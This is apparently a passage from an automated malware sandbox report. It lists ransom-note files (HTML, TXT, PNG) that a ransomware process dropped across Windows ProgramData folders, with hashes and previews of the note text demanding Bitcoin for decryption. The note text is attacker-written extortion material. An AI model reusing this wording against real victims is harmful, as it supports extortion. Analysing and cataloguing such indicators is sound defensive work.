                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\DeviceSync\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\DeviceSync\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\AsimovUploader\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\AsimovUploader\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\AsimovUploader\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\CustomTraceProfiles\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\CustomTraceProfiles\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\CustomTraceProfiles\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ScenarioShutdownLogger\help_recover_instructions+fnc.html
